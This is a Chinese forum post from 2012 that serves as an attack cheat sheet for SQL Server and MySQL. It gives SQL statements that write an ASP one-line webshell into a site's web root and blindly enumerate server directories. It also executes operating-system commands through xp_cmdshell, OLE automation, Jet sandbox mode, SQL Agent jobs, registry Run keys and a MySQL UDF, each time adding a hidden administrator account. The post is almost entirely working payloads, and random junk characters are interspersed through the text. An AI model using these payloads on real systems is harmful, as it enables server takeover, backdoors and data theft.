MSSQL语句导出一句话木马
W* [7 b& H$ W" M首先确定网站的WEB路径
; U" u4 K' X& _;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马1 b( |5 y# p6 A1 P& v# p3 x
1 u9 i7 f. W" @' G6 |' r* o7 u2 G
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- ! e9 m7 J3 Y/ F% W. F& j R0 ?) S
//将一句话木马插入表中/ F3 C( o6 e" f7 U3 ?; z
, ]0 Y& j; K' R6 z3 f6 `
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- 4 K5 f( U2 M8 R7 ^
//导出一个ASP文件
( k7 u+ G8 s% K( J& {; P
) X' h. n/ i! G( G$ s
, q- r$ _1 W! |' @1 l关于MSSQL列目录( p: _: ~2 ?# C3 c
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表
) s$ {1 h0 ?; ]4 D; |) T0 HInsert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表
1 D5 V4 r& p( V u5 P$ x! i) M+ T* d) A" a. q# n0 G0 f8 @9 [
and (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录; E# j! g$ i) w9 D: s
6 e2 @; o! t- e5 |+ u/ ]
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段# ^( F+ I" _9 \
) [0 `$ z# Z0 v
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
) r' S& |5 s ]0 d( O3 \9 q) O6 ]# B* R0 E1 T. V6 ~2 ~! X
6 n! y0 V2 l( D. N( d数据库版本和权限查看- C* T5 A- ^: G1 t: O2 G
and 1=(select @@VERSION) //查看详细的数据库信息." }' O) g8 E1 U$ k
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
7 T% N0 l5 c; ~: ^6 T8 ~1 L+ zand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER
! z- \/ `/ \# A+ S$ L$ @4 v
0 J) ^9 f( u0 X; e0 o
) n/ ^% T8 ~. A& o. B8 u* i* K, O1.利用xp_cmdshell执行命令# o/ |6 h# o( ^ k0 ]8 m7 k
exec master..xp_cmdshell 'net user rfire 123456 /add'
9 }9 [3 j: H! w, a# \exec master..xp_cmdshell 'net localgroup administrators rfire /add'$ N+ L. J+ Y" l* P- Q
; R- Y3 i5 K& y7 F' d* F5 }
恢复xp_cmdshell存储过程
' G5 o1 g7 `" z" LExec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
- a+ @6 M- J' o
5 q$ L' W9 |7 ? L i1 I- }# C- e' ~/ J4 x- p4 q
2.利用SP_OAcreate和SP_OAMETHOD执行命令
5 R. @0 k9 i& a4 p6 e% J) h1 f在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
0 b$ Z& c8 }9 E5 _DECLARE @shell INT //建立一个@shell实体
: m7 ?9 ^ {# ^5 l5 sEXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例4 ^( S8 p8 t4 n. D1 |6 }; m
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例
" T" A; A) ]) s
, y, a. Y2 O4 }% a6 V9 T, Z5 m0 ^ ?2 \' P
3.利用沙盒模式, V+ t. a4 s: x2 c5 P
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。( b4 T# y; r! g
开启沙盒模式:- E% s: e+ Q- W
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
: ^8 C# v' _5 R; f6 _& C7 R5 }* U5 n$ h/ O( q
执行命令:* J, s- k4 N w& A4 [2 l+ Q$ |
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');6 o* l" x8 m( C4 t& A
$ c' g' O5 i* J& W) w* N' n$ |- v. `
8 ^, X" \- s% N
4.利用SQL代理执行命令: [% r2 i6 v9 [+ @# b' j8 p
EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
7 o7 q! Q& J) P5 t/ {) S1 P
- t% `3 U4 v$ B; d, O执行命令:5 m* v# X5 q7 M) [6 d
use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错9 |! a2 V1 i$ y2 |( q! q! n
exec sp_add_job 'x'1 N [* z3 {1 {) G
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业- k; F7 ^0 `$ ^
exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业9 S8 W4 |6 \( K6 o1 ~- ]. M
6 x' O2 A9 J' s1 _( a1 I0 \7 P& |
P" S5 c+ s$ X$ K
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)7 j/ W% \/ t0 q1 c
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
/ L( ~6 G9 n' q' h* D0 o: v* {, o+ H K5 b+ q/ R' N
4 r2 ~: F7 m* P/ b
6.MYSQL的命令执行$ ]# D2 Q3 |6 t
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)2 b b- [7 \, R* G+ c B) s" C {
首先要在su.php下导出c:\windows\udf.dll" U; t. I2 Z- u% j, _
导出后执行创建自定义函数命令:
$ t) ~ ~- ]. w% o H8 iCreate Function cmdshell returns string soname 'udf.dll'
+ Y" }+ ~$ s& d( w" A7 E, T# X执行命令
; S! [6 {: e! v+ O& Rselect cmdshell('net user rfire 123456 /add')
0 |1 r' F, c* f( E% ~, H9 O执行后删除函数 drop function cmdshell
' ^, r8 J) N: `8 m7 ?. c H |
发表于 2012-9-13 17:49:59
收藏
支持
反对